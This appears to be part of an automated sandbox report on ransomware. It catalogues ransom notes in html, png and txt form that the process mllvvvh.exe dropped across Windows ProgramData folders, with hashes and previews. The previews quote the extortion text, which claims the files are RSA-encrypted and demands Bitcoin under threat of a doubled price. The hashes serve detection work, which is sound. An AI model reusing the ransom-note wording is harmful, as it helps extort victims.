                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Config\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Config\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Config\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
